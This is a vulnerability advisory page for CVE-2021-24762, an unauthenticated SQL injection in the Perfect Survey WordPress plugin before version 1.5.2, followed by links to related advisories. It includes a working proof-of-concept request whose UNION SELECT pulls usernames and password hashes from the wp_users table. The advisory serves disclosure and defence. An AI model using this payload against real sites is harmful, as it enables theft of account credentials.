Lucene search
Apple502jWPVDB-ID:C1620905-7C31-4E62-80F5-1D9635BE11ADHistoryOct 05, 2021 - 12:00 a.m.
Perfect Survey < 1.5.2 - Unauthenticated SQL Injection
2021-10-0500:00:00
apple502j
wpscan.com
69
The plugin does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
PoC
(The question_id must start with an existing post ID) https://example.com/wp-admin/admin-ajax.php?action=get_question&question;_id=1 union select 1%2C1%2Cchar(116%2C101%2C120%2C116)%2Cuser_login%2Cuser_pass%2C0%2C0%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull from wp_users
| CPE | Name | Operator | Version |
|---|---|---|---|
| perfect-survey | lt | 1.5.2 |
Related
cnvd
cnvd
WordPress Perfect SurveyๆไปถSQLๆณจๅ
ฅๆผๆด
2022-02-10 00:00:00
prion
prion
Sql injection
2022-02-01 13:15:00
attackerkb
attackerkb
CVE-2021-24762
2022-02-01 00:00:00
zdt
zdt
nuclei
nuclei
WordPress Perfect Survey <1.5.2 - SQL Injection
2022-02-25 06:27:21
patchstack
patchstack
packetstorm
packetstorm
WordPress Perfect Survey 1.5.1 SQL Injection
2022-02-21 00:00:00
cve
cve
CVE-2021-24762
2022-02-01 13:15:00
wpexploit
wpexploit
Perfect Survey < 1.5.2 - Unauthenticated SQL Injection
2021-10-05 00:00:00
exploitdb
exploitdb
WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)
2022-02-21 00:00:00
Related for WPVDB-ID:C1620905-7C31-4E62-80F5-1D9635BE11AD